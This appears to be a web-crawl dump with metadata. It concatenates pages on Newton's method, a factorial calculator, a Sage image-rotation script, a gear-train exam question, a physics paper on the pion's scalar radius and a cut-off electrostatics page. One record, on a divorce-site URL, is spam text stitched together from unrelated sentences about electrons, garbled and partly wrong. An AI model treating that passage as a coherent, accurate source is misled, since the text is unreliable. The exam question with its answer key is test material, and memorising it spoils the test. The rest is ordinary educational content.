msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:739f00ed-2e0d-410c-9bde-1cd9099f9a72>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff63dc88-752a-4578-933e-100fe18296a4>\",\"WARC-IP-Address\":\"35.163.124.18\",\"WARC-Target-URI\":\"https://www.mometrix.com/academy/ideal-gas-law/\",\"WARC-Payload-Digest\":\"sha1:OCYDGOZ5KFEZQTN7RKZT6UWHUKJJIY3O\",\"WARC-Block-Digest\":\"sha1:HDYEUPMKRH347QD2SEDBQ3SPRCIWHZRC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986675598.53_warc_CC-MAIN-20191017172920-20191017200420-00314.warc.gz\"}"} |
http://www.stopyourdivorce.com/journal/rocketship-x-m-full-movie-9dfd5a | [
"It was discovered in 1897 by J.J. Thompson. The electron configuration of an element describes how electrons are distributed in its atomic orbitals. Now that we understand the difference between sigma and $$\\pi$$ electrons, we remember that the $$\\pi$$ bond is made up of loosely held electrons that form a diffuse cloud which can be easily distorted. Introduction to Chemistry. They have a charge of negative one elementary charge and a mass that is 1/1836 that of a proton. It is a very small piece of matter and energy.\n\n2) A particle of matter that has a negative electric charge of 4.8 E -10 esu and a mass of 9.1E -28g or 1/1837 the mass of a proton. Proton, Electron, Neutron - Definition - Formula - Application - Worksheet understanding the basic concept of chemistry study, especially organic chemistry They are known as elementary particles because they can no be broken down into smaller particles. Electron configurations of atoms follow a standard notation in which all electron-containing atomic subshells (with the number of electrons they hold written in superscript) are placed in a sequence. Because it measures the attraction, or affinity, of the atom for the added electron. 1) A subatomic particle having a mass of 0.00054858 amu and a charge of 1-.\n\nPractical reason: It is mandatory for heavy-element chemistry (i.e., beyond organic chemistry) Electron Density in (Relativistic) Quantum Theory Markus Reiher. Search for: Electron Orbitals . Electron definition is - an elementary particle consisting of a charge of negative electricity equal to about 1.602 × 10—19 coulomb and having a mass when at rest of about 9.109 × 10—31 kilogram or about 1/1836 that of a proton.\n\nDistinguish between electron orbitals in the Bohr model versus the quantum mechanical orbitals; Key Points .\n\nIntroduction to Quantum Theory. Definition of electron. Definition of Electron. For most atoms, energy is released when an electron is added. Electrons a sub-atomic particles.\n\nFor example, the electron configuration of sodium is 1s\n\nElectron configuration is the distribution of electrons of an atom or molecule (or other physical structure) in atomic or molecular orbitals; for example, the electron configuration of a neon atom is 1s 2 2s 2 2p 6.Electronic configurations describe electrons as each moving independently in an orbital, in an average field created by all other orbitals. Learning Objective.\n\nThe energy change that occurs when an electron is added to a neutral atom in the gaseous state to form a negative ion is called electron affinity. They can be found as a constituent part of an atom orbiting around the nucleus or in the free state.\n\nGRC 2010 Introduction World of relativistic quantum theory Scalar−relativistic formulations by neglect of spin−dependent terms or use of ECPs 1−component Quantum Electrodynamics Local QED Model Potentials 4−comp.\n\nMobility Of $$\\pi$$ Electrons and Unshared Electron Pairs. Chemistry Electron Affinity: Definition & Examples with Equations & values in Periodic Table."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.88159305,"math_prob":0.9422424,"size":3021,"snap":"2022-05-2022-21","text_gpt3_token_len":665,"char_repetition_ratio":0.14153132,"word_repetition_ratio":0.008368201,"special_character_ratio":0.21549156,"punctuation_ratio":0.097426474,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9668026,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T00:48:38Z\",\"WARC-Record-ID\":\"<urn:uuid:6c9157f8-bf31-4e07-a7f6-3b433cf13676>\",\"Content-Length\":\"21317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eb553daa-4bc2-4fc3-aa33-f7559ca9ec15>\",\"WARC-Concurrent-To\":\"<urn:uuid:c5a58df5-fe17-454b-9f58-26c4bc2b3e74>\",\"WARC-IP-Address\":\"98.129.229.166\",\"WARC-Target-URI\":\"http://www.stopyourdivorce.com/journal/rocketship-x-m-full-movie-9dfd5a\",\"WARC-Payload-Digest\":\"sha1:R4W4BZH4XIHOSCYSR2H3Q3LMFT4NT72L\",\"WARC-Block-Digest\":\"sha1:GV2QRPAQED3RA4W2FIKJVMDPYRYWWAOT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662595559.80_warc_CC-MAIN-20220526004200-20220526034200-00473.warc.gz\"}"} |
http://mathonline.wikidot.com/newton-s-method-for-approximating-roots | [
"Newton's Method for Approximating Roots\n\n# Newton's Method for Approximating Roots\n\nWe will now look at another method for approximating roots of functions. Suppose that $y = f(x)$, and let $\\alpha$ be a root of $f$, and suppose that $x_0$ is a first approximation of the root $\\alpha$ of $f$. Now consider the tangent line to the graph of $f$ at the point $(x_0, f(x_0))$. Provided that this tangent line does not have slope $0$, then this tangent line will have a root of its own that will approximately be equal to $\\alpha$.",
null,
"The equation of this tangent line can be given by the following equation:\n\n(1)\n\\begin{align} \\quad p_1(x) = f(x_0) + f'(x_0)(x - x_0) \\end{align}\n\nIf we set $p_1(x) = 0$ and solve for $x_1$ as the $x$-intercept of the tangent line $p_1(x)$, then we obtain:\n\n(2)\n\\begin{align} \\quad p_1(x) = f(x_0) + f'(x_0)(x - x_0) \\\\ \\quad 0 = f(x_0) + f'(x_0)(x_1 - x_0) \\\\ \\quad x_1 = x_0 -\\frac{f(x_0)}{f'(x_0)} \\end{align}\n\nWe now take $x_1$ (the root of the first tangent line) to be an approximation of $\\alpha$. If we now look at the tangent line at $(x_1, f(x_1))$ on $f$, then we obtain a new tangent line, and provided that the slope of this tangent line is not $0$, then this tangent line has a root of its own that is an even better approximation of $\\alpha$.",
null,
"The equation of this tangent line can be given by the following equation:\n\n(3)\n\\begin{align} \\quad p_2(x) = f(x_1) + f'(x_1)(x - x_1) \\end{align}\n\nOnce again, if we set $p_1(x) = 0$ and solve for $x_2$ as the x-intercept of the tangent line $p_2(x)$, then we obtain:\n\n(4)\n\\begin{align} \\quad x_2 = x_1 -\\frac{f(x_1)}{f'(x_1)} \\end{align}\n\nIn fact, the more we repeat this procedure, the closer and closer our approximation gets to $\\alpha$. For $n + 1$ iterations of this procedure and provided that $f'(x_i) \\neq 0$ for $i = 1, 2, ..., n$, we obtain the following general formula for the $x$-intercepts of the corresponding tangent lines as approximations to $\\alpha$:\n\n(5)\n\\begin{align} \\quad x_{n+1} = x_n - \\frac{f(x_n)}{f'(x_n)} \\end{align}\n Theorem 1 (Newton's Method): Suppose that $f$ is a differentiable function that contains the root $\\alpha$, and $x_0$ is an approximation of $\\alpha$. Step 1: A better approximation of $x_1$ can be obtained as $x_1 = x_0 - \\frac{f(x_0)}{f'(x_0)}$ provided that $f'(x_0) \\neq 0$. Step n + 1: A better approximation of $x_{n}$ can be obtained as $x_{n+1} = x_n - \\frac{f(x_n)}{f'(x_n)}$ provided that $f'(x_n) \\neq 0$.\n\nOne advantage of Newton's Method is that the sequence of approximations $\\{ x_n \\}$ tend to converge much more quickly towards the root $\\alpha$. The major disadvantage of Newton's Method is that the sequence of approximations $\\{ x_n \\}$ may not converge to $\\alpha$ if we do not choose an initial approximation $x_0$ that is sufficiently close to $\\alpha$. We discuss this potential problem on the Error Analysis of Newton's Method for Approximating Roots page."
] | [
null,
"http://mathonline.wdfiles.com/local--files/newton-s-method-for-approximating-roots/Screen%20Shot%202015-01-21%20at%208.39.37%20AM%281%29.png",
null,
"http://mathonline.wdfiles.com/local--files/newton-s-method-for-approximating-roots/Screen%20Shot%202015-01-21%20at%208.56.00%20AM.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90842503,"math_prob":1.0000012,"size":2453,"snap":"2022-40-2023-06","text_gpt3_token_len":690,"char_repetition_ratio":0.18089016,"word_repetition_ratio":0.123222746,"special_character_ratio":0.29922545,"punctuation_ratio":0.087318085,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000079,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T03:05:50Z\",\"WARC-Record-ID\":\"<urn:uuid:9cc1a7af-a6d8-4729-b685-8b7dd10966a1>\",\"Content-Length\":\"19055\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e6f940bb-9f0e-43d6-8cd5-40c9bd9316f7>\",\"WARC-Concurrent-To\":\"<urn:uuid:01951180-cb24-4c88-9a1c-8600a766ff9b>\",\"WARC-IP-Address\":\"107.20.139.170\",\"WARC-Target-URI\":\"http://mathonline.wikidot.com/newton-s-method-for-approximating-roots\",\"WARC-Payload-Digest\":\"sha1:73ASFHAWEHRECKDMEJETV4YXDD4PVEDS\",\"WARC-Block-Digest\":\"sha1:NIEELMNVHIRKXDCUBW3JV4O3BVJ3PHLY\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337906.7_warc_CC-MAIN-20221007014029-20221007044029-00756.warc.gz\"}"} |
https://www.stattrek.com/online-calculator/factorial.aspx | [
"# Factorial Calculator\n\nFind the factorial of any number between 1 and 170. For help in using the calculator, read the Frequently-Asked Questions or review the Sample Problem.\n\n• Enter a number in the unshaded text box.\n• Click the Calculate button to display the factorial value of that number.\n Number ( n ) n Factorial\n\nInstructions: To find the answer to a frequently-asked question, simply click on the question.\n\n### What is a factorial?\n\nIn general, n objects can be arranged in n(n - 1)(n - 2) ... (3)(2)(1) ways. This product is represented by the symbol n!, which is called n factorial. By convention, 0! = 1.\n\nThus, 0! = 1; 2! = (2)(1) = 2; 3! = (3)(2)(1) = 6; 4! = (4)(3)(2)(1) = 24; 5! = (5)(4)(3)(2)(1) = 120; and so on.\n\nFactorials can get very big, very fast. The term 170! is the largest factorial that the Factorial Calculator can evaluate. The term 171! produces a result that is too large to be processed by this software; it is bigger than 10 to the 308th power.\n\nFor an example that computes a factorial, see Sample Problem 1.\n\n### What is E-Notation?\n\nE notation is a way to write numbers that are too large or too small to be concisely written in a decimal format.\n\nWith E notation, the letter E represents \"times ten raised to the power of\". Here is an example of a number written using E notation:\n\n3.02E12 = 3.02 * 1012 = 3,020,000,000,000\n\nThe Factorial Calculator uses E notation to express very large numbers. For example, the term 170! is expressed in E notation as 7.25741561530799E+306.\n\n### How accurate is E-Notation?\n\nIf the Factorial Calculator displays a result in E notation, that result is not exact. It is an approximation. At best, it is accurate to within 16 significant digits.\n\n## Sample Problem\n\n1. A standard deck of playing cards has 13 spades. How many ways can these 13 spades be arranged?\n\nSolution:\n\nThe solution to this problem involves calculating a factorial. Since we want to know how 13 cards can be arranged, we need to compute the value for 13 factorial.\n\n13! = (1)(2)(3)(4)(5)(6)(7)(8)(9)(10)(11)(12)(13) = 6,227,020,800\n\nNote that the above calculation is a little cumbersome to compute by hand, but it can be easily computed using the Factorial Calculator. To use the Factorial Calculator, do the following:\n\n• Enter \"13\" for n.\n• Click the \"Calculate\" button.\n\nThe answer, 6,227,020,800, is displayed in the \"n Factorial\" textbox."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8990497,"math_prob":0.9968584,"size":1574,"snap":"2019-51-2020-05","text_gpt3_token_len":456,"char_repetition_ratio":0.12866242,"word_repetition_ratio":0.0,"special_character_ratio":0.31575602,"punctuation_ratio":0.17428571,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99621916,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T06:00:44Z\",\"WARC-Record-ID\":\"<urn:uuid:7f4a5242-2a3a-4980-832b-53b528c5a196>\",\"Content-Length\":\"65751\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05fa00a5-c797-4987-9ad8-4df393d02e82>\",\"WARC-Concurrent-To\":\"<urn:uuid:9252b718-f4a4-426e-b088-2ec5229c74cf>\",\"WARC-IP-Address\":\"35.153.87.42\",\"WARC-Target-URI\":\"https://www.stattrek.com/online-calculator/factorial.aspx\",\"WARC-Payload-Digest\":\"sha1:RZMQ3AGO3J67DLPBGNOIX5QLI7NNC43M\",\"WARC-Block-Digest\":\"sha1:PC3XML2GWJP6HUD6ILEGUSVATEO5NVQQ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00163.warc.gz\"}"} |
https://www.adamponting.com/diagonal-rotation/ | [
"# Diagonal rotation\n\nSage Cython: To run, type `%attach PicDiagRotate.pyx` and `OK()` at the Sage command line, or paste into a Sage notebook with `%cython` as the first line.\n\n```#PicDiagRotate.pyx\nimport numpy as np\ncimport numpy as np\nfrom scipy import misc\nDEF side=512\nDEF halfside=side/2\ncpdef OK():\ncdef int i,w,row,loops,lps,L,R,t\ncdef np.ndarray[np.uint8_t, ndim=3] a\nfn=\"tiger-09.png\" #a 512x512 colour png\nfor w in xrange(1,halfside+1):\nfor row in xrange(w,halfside+1):\n#row 1 is the 4 pixels at centre, 256 is around edge of pic.\nif row>1: #do twice more for each row outside the first\nloops=2\nelse:\nloops=1\nfor lps in xrange(loops):\nL=halfside-row\nR=side-1-L\nfor i in xrange(3): #store temp pixel\nt[i]=a[L][L][i]\nfor i in xrange(L,R,1):\t#move left column down\na[L][i]=a[L][i+1]\nfor i in xrange(L,R): #move top row to the left\na[i][R]=a[i+1][R]\nfor i in xrange(R,L,-1): #move right column up\na[R][i]=a[R][i-1]\nfor i in xrange(R,L,-1):#move bottom row to right\na[i][L]=a[i-1][L]\nfor i in xrange(3): #put temp back\na[L+1][L][i]=t[i]\nprint w\nmisc.imsave('tpics/%05d.png' % w,a) #NB make a folder called 'tpics' first.\n```"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6153181,"math_prob":0.9604242,"size":1116,"snap":"2023-40-2023-50","text_gpt3_token_len":396,"char_repetition_ratio":0.14748201,"word_repetition_ratio":0.0,"special_character_ratio":0.3405018,"punctuation_ratio":0.14900662,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99340653,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-23T11:07:11Z\",\"WARC-Record-ID\":\"<urn:uuid:6de75489-93da-4259-92b4-6190bef06654>\",\"Content-Length\":\"43265\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d0f3dab-c2cd-4b10-b5be-db57afaec66c>\",\"WARC-Concurrent-To\":\"<urn:uuid:dcb3fcde-5b61-4983-bb74-cca9a922d745>\",\"WARC-IP-Address\":\"103.27.34.18\",\"WARC-Target-URI\":\"https://www.adamponting.com/diagonal-rotation/\",\"WARC-Payload-Digest\":\"sha1:ABOD2HHBVFCA6EBPK6IQD3MCEEV6BO2X\",\"WARC-Block-Digest\":\"sha1:DXKOPSTA5YXSMOITFAIKQZAZP27X3RNF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506480.7_warc_CC-MAIN-20230923094750-20230923124750-00518.warc.gz\"}"} |
https://testbook.com/question-answer/a-gear-train-shown-in-the-figure-consists-of-gears--58f600f7995a2d4c28767cda | [
"A gear train shown in the figure consists of gears P, Q, R and S. Gear Q and gear R are mounted on the same shaft. All the gears are mounted on parallel shafts and the number of teeth of P, Q, R and S are 24, 45, 30 and 80, respectively. Gear P is rotating at 400 rpm. The speed (in rpm) of the gear S is ________",
null,
"This question was previously asked in\nPY 8: GATE ME 2017 Official Paper: Shift 2\nView all GATE ME Papers >\n\nAnswer (Detailed Solution Below) 119 - 121\n\nFree\nCT 1: Ratio and Proportion\n4927\n10 Questions 16 Marks 30 Mins\n\nDetailed Solution\n\nConcept:\n\n$$\\frac{{{N_Q}}}{{{N_P}}} = \\frac{{{T_P}}}{{{T_Q}}} = \\frac{{24}}{{45}} \\Rightarrow \\frac{{{N_Q}}}{{400}} = \\frac{{24}}{{45}} \\Rightarrow {N_Q} = 400 \\times \\frac{{24}}{{45}} = \\frac{{640}}{3}$$\n\n$$\\Rightarrow \\frac{{{N_Q}}}{{{N_s}}} = \\frac{{{T_S}}}{{{T_Q}}} = \\frac{{80}}{{45}} \\Rightarrow {N_s} = {N_Q} \\times \\frac{{{T_Q}}}{{{T_s}}} = \\frac{{640}}{3} \\times \\frac{{45}}{{80}} = 120\\;rpm$$"
] | [
null,
"https://storage.googleapis.com/tb-img/production/17/04/Capture%201234567891017.PNG",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7265144,"math_prob":0.9996481,"size":1003,"snap":"2022-05-2022-21","text_gpt3_token_len":325,"char_repetition_ratio":0.16716717,"word_repetition_ratio":0.0,"special_character_ratio":0.4336989,"punctuation_ratio":0.08695652,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99894696,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-17T08:05:35Z\",\"WARC-Record-ID\":\"<urn:uuid:6ef7bb23-825b-4b6b-b1ff-f997fcf1dae0>\",\"Content-Length\":\"121738\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2307ac6-c2d7-49b0-b9f2-7f410dfd5edd>\",\"WARC-Concurrent-To\":\"<urn:uuid:b04872aa-4a57-4167-9d3b-095e46c0e3a7>\",\"WARC-IP-Address\":\"172.67.30.170\",\"WARC-Target-URI\":\"https://testbook.com/question-answer/a-gear-train-shown-in-the-figure-consists-of-gears--58f600f7995a2d4c28767cda\",\"WARC-Payload-Digest\":\"sha1:SXLMDU73TOPHSNXX4NHVQV2GCZTDOQH2\",\"WARC-Block-Digest\":\"sha1:HE5ZY5RDUJUNQAG3WBCIHMBWG5XTNAJQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320300343.4_warc_CC-MAIN-20220117061125-20220117091125-00035.warc.gz\"}"} |
https://www.groundai.com/project/scalar-radius-of-the-pion-in-the-kroll-lee-zumino-renormalizable-theory/ | [
"Scalar radius of the pion in the Kroll-Lee-Zumino renormalizable theory\n\n# Scalar radius of the pion in the Kroll-Lee-Zumino renormalizable theory\n\nC. A. Dominguez Centre for Theoretical Physics and Astrophysics, University of Cape Town, Rondebosch 7700 Department of Physics, Stellenbosch University, Stellenbosch 7600, South Africa M. Loewe Facultad de Física, Pontificia Universidad Católica de Chile, Casilla 306, Santiago 22, Chile B. Willers Centre for Theoretical Physics and Astrophysics, University of Cape Town, Rondebosch 7700\nSeptember 1, 2019\n###### Abstract\n\nThe Kroll-Lee-Zumino renormalizable Abelian quantum field theory of pions and a massive rho-meson is used to calculate the scalar radius of the pion at next to leading (one loop) order in perturbation theory. Due to renormalizability, this determination involves no free parameters. The result is . This value gives for , the low energy constant of chiral perturbation theory, , and , where F is the pion decay constant in the chiral limit. Given the level of accuracy in the masses and the coupling, the only sizable uncertainty in this result is due to the (uncalculated) NNLO contribution.\n\nvector meson dominance, pion physics, chiral perturbation theory\n###### pacs:\n12.40.vV, 12.39.Fe, 11.30.Rd\npreprint: UCT-TP-273/08\n\nThe pion matrix element of the QCD scalar operator defines the scalar form factor of the pion FS\n\n Γπ(q2)=⟨π(p2)|JS|π(p1)⟩, (1)\n\n Γπ(q2)=Γπ(0)[1+16⟨r2π⟩sq2+...], (2)\n\nplays a very important role in chiral perturbation theory REVCPT , as it fixes , one of the low energy constants of the theory, through the relation\n\n ⟨r2π⟩s=38π2F2π[¯ℓ4−1312+O(M2π)], (3)\n\nwhere . The low energy constant , in turn, determines the leading contribution in the chiral expansion of the pion decay constant, i.e.\n\n FπF=1+(Mπ4πFπ)2¯ℓ4+O(M4π), (4)\n\nwhere F is the pion decay constant in the chiral limit. For this reason considerable effort has been devoted over the years to the determination of from scattering data together with a variety of theoretical tools (for some recent work see V1 -OLLER ). Current values OLLER appear to converge inside the range which translates into , and . Lattice QCD results LQCD span the wide range , although results with the smaller errors cluster around .\n\nIn this paper we present a next to leading order calculation of in the framework of the Kroll-Lee-Zumino (KLZ) renormalizable Abelian gauge theory of charged pions and a massive neutral vector meson KLZ . This theory provides the quantum field theory justification for the Vector Meson Dominance (VMD) ansatz VMD . It also provides a quantum field theory platform to compute corrections to VMD systematically in perturbation theory. A determination in this framework of the electromagnetic form factor of the pion in the time-like GK as well as the spacelike region CAD1 , at the one-loop level, which is in excellent agreement with data supports this assertion. In fact, due to the relative mildness of the coupling constant, and the presence of loop suppression factors, the perturbative expansion appears well behaved in spite of the strong coupling nature of the theory. The KLZ Lagrangian is given by\n\n LKLZ = ∂μϕ∂μϕ∗−M2πϕϕ∗−14ρμνρμν+12M2ρρμρμ (5) + gρππρμJμπ +g2ρππρμρμϕϕ∗,\n\nwhere is a vector field describing the meson (), is a complex pseudo-scalar field describing the mesons, is the usual field strength tensor: , and is the current: . It should be stressed that in spite of the explicit presence of the mass term above, the theory is renormalizable because the neutral vector meson is coupled only to a conserved current KLZ .\n\nIn Fig.1 and in Fig.2 we show, respectively, the leading order, and the next to leading order contributions to the scalar form factor Eq.(1). The cross indicates the coupling of the scalar operator to two pions. There is still another triangle graph with two rho-mesons coupled to the scalar current . However, since the scalar form factor vanishes identically in the chiral limit, two rho-mesons would have to couple to through two pions (a coupling present in Eq.(5)). This transforms this term into a two-loop () contribution, which is beyond the scope of the present work.\n\nUsing the Feynman propagator for the -meson Hees -Quigg , and in -dimensions, the unrenormalized vertex in Fig. 2 is given by\n\n ˜G(q2)=g2ρππ(μ3)2−d2∫ddk(2π)d(2p1+k)⋅(2p2+k)[(p1+k)2−M2π+iε][(p2+k)2−M2π+iε](k2−M2ρ+iε), (6)\n\nwhere we omitted the overall normalization . Using standard procedures (for details of a similar calculation see CAD1 ) the function in dimensional regularization is\n\n ˜G(q2) = −2g2ρππ(4π)2(μ2)(2−d2)∫10dx1∫1−x10dx2 (7) × {2ε−ln(Δ(q2)μ2)−12−γ+ln(4π) + 12Δ(q2)[M2π(x1+x2−2)2 − q2(x1x2−x1−x2+2)]+O(ε)11},\n\nwhere is defined as\n\n Δ(q2)=M2π(x1+x2)2+M2ρ(1−x1−x2)−x1x2q2. (8)\n\nIn the scheme, and renormalizing the vertex function at the point we obtain\n\n G(q2)−G(0)=−2g2ρππ(4π)2∫10dx1∫1−x10dx2 (9) × {ln(Δ(q2)Δ(0))+12[M2π(x1+x2−2)2(1Δ(q2) − 1Δ(0))−q2Δ(q2)(x1x2−x1−x2+2)]},\n\nwith the scalar form factor being given by\n\n Γπ(q2)=Γπ(0)[1+G(q2)−G(0)]. (10)\n\nDetails of the standard renormalization procedure for the fields, masses and coupling may be found in CAD1 . From Eq.(9) we compute the scalar radius with the result\n\n ⟨r2π⟩s = 12(4π)2g2ρππ∫10dx1∫1−x10dx21Δ(0) (11) × {x1x2[1−M2π2Δ(0)(x1+x2−2)2] + 12(x1x2−x1−x2+2)}.\n\nA numerical evaluation of this equation gives the result\n\n ⟨r2π⟩s=0.4 fm2, (12)\n\nwhere we used from the measured width of the PDG . The error in this coupling, as well as in the masses, has negligible impact on the radius at the level of precision given in Eq.(12). The main uncertainty in this determination stems from the uncalculated NNLO (two-loop) contribution. Using Eqs.(3) and (4) to leading order, the result above translates into\n\n ¯ℓ4=3.4, (13)\n\nand\n\n Fπ/F=1.05. (14)\n\nThe result for the radius in this framework is somewhat smaller than current values obtained from scattering V1 -OLLER , although it agrees with some of the lattice QCD results LQCD . It should be mentioned that in the framework of KLZ the electromagnetic square radius of the pion at NLO is CAD1 , to be compared with the experimental value RADIUSEM . In the electromagnetic case NLO refers to the correction to the tree-level result of single -dominance . Hence this correction is relatively large, and in the right direction. In the present application the equivalent of -dominance is absent, as there is no elementary sigma field in the KLZ Lagrangian. One would have to resort to e.g. the linear sigma model as in GL , but then there is no field in the model. An attempt to enlarge the KLZ theory to accommodate a sigma field does not seem a useful proposition. In fact, scalar meson dominance is probably too simplistic to be able to account for the rich and complex structure of the channel. We find that the result obtained here for the scalar radius of the pion provides additional support for the KLZ theory as a viable platform to compute corrections to VMD systematically in perturbation theory.\n\nAcknowledgements\n\nThe authors wish to thank to Heiri Leutwyler for a valuable discussion, and for his comments on the manuscript. This work has been supported in part by FONDECYT 1051067, 7070178, and by Centro de Estudios Subatomicos (Chile), and by NRF (South Africa).\n\n## References\n\n• (1) T.N. Truong, and R.S. Willey, Phys. Rev. D 40,3635 (1989); J.F. Donoghue, J. Gasser, and H. Leutwyler, Nucl. Phys. B 343, 341 (1990).\n• (2) For reviews see e.g. S. Scherer, Adv. Nucl. Phys. 27, 277 (2003); J. Gasser, Lect. Notes Phys. 629, 1 (2004).\n• (3) B. Moussallam, Eur. Phys. J. C 14, 111 (2000); G. Colangelo, J. Gasser,and H. Leutwyler, Nucl. Phys. B 603, 125 (2001); B. Ananthanarayan, I. Caprini, G. Colangelo, J. Gasser, and H. Leutwyler, Phys. Lett. B 602, 218 (2004); F.J. Yndurain, Phys. Lett. B 612, 245 (2005).\n• (4) J.A. Oller, and L. Roca, Phys. Lett. B 651, 139 (2007).\n• (5) For a recent review of the various determinations see e.g. S. Necco, PoS LAT 2007:021,2007, and arXiv:0710.2444.\n• (6) N.M. Kroll, T.D. Lee, and B. Zumino, Phys. Rev. 175 (1967) 1376; J.H. Lowenstein, and B. Schroer,Phys. Rev. D 6 (1972) 1553.\n• (7) J.J. Sakurai, Ann. Phys. (N.Y.) 11 (1960) 1; ibid. Currents and Mesons, University of Chicago Press (1969).\n• (8) C. Gale, and J. Kapusta, Nucl. Phys. B 357 (1991) 65.\n• (9) C.A. Dominguez, M. Loewe, J.I. Jottar, and B. Willers, Phys. Rev. D 76, 095002 (2007). This paper has a misprint in Eq.(15) (the sign of the first term in curly brackets should be negative), with the remaining equations being correct. The electromagnetic square radius of the pion quoted in the paper is incorrect; the correct value is , in much better agreement with data than naive (single ) VMD.\n• (10) H. van Hees, hep-th/0305076 (unpublished); H. Ruegg, and M. Ruiz-Altaba, Int. J. Mod. Phys. A 19 (2004) 3265.\n• (11) C. Quigg, Gauge Theories of Strong, Weak, and Electromagnetic Interactions, Benjamin (1983).\n• (12) Review of Particle Physics, Particle Data Group, J. Phys. G: Nucl. Part. Phys. 33, 1 (2006).\n• (13) NA7 Collaboration, S. R. Amendolia et al., Nucl. Phys. B 277, 168 (1986).\n• (14) J. Gasser, and H. Leutwyler, Ann. Phys. (N.Y) 158, 142 (1984).\nYou are adding the first comment!\nHow to quickly get a good reply:\n• Give credit where it’s due by listing out the positive aspects of a paper before getting into which changes should be made.\n• Be specific in your critique, and provide supporting evidence with appropriate references to substantiate general statements.\n• Your comment should inspire ideas to flow and help the author improves the paper.\n\nThe better we are at sharing our knowledge with each other, the faster we move forward.\nThe feedback must be of minimum 40 characters and the title a minimum of 5 characters",
null,
"",
null,
"",
null,
""
] | [
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/loader_30.gif",
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/comment_icon.svg",
null,
"https://dp938rsb7d6cr.cloudfront.net/static/1.71/groundai/img/about/placeholder.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8501661,"math_prob":0.95047015,"size":7894,"snap":"2020-24-2020-29","text_gpt3_token_len":2106,"char_repetition_ratio":0.1269962,"word_repetition_ratio":0.03358209,"special_character_ratio":0.27007854,"punctuation_ratio":0.18379685,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9661809,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-29T20:08:14Z\",\"WARC-Record-ID\":\"<urn:uuid:93af2060-d6ff-4c6a-a1f4-746707368467>\",\"Content-Length\":\"331411\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:68d291fe-9db2-4ee5-922b-be7790a35060>\",\"WARC-Concurrent-To\":\"<urn:uuid:c9f6e57f-a4c3-472f-b6c5-681e383e9952>\",\"WARC-IP-Address\":\"35.186.203.76\",\"WARC-Target-URI\":\"https://www.groundai.com/project/scalar-radius-of-the-pion-in-the-kroll-lee-zumino-renormalizable-theory/\",\"WARC-Payload-Digest\":\"sha1:5Y34IEPEKWH4BW5TQFXBADZ3NPZKBNMA\",\"WARC-Block-Digest\":\"sha1:7IZCSRJC5P55SJR2MT3R7QSLHEQBV3RL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347406365.40_warc_CC-MAIN-20200529183529-20200529213529-00062.warc.gz\"}"} |
http://farside.ph.utexas.edu/teaching/jk1/Electromagnetism/node46.html | [
"",
null,
"",
null,
"",
null,
"Next: Exercises Up: Electrostatics in Dielectric Media Previous: Clausius-Mossotti Relation\n\n# Dielectric Liquids in Electrostatic Fields\n\nConsider the behavior of an uncharged dielectric liquid placed in an electrostatic field. If",
null,
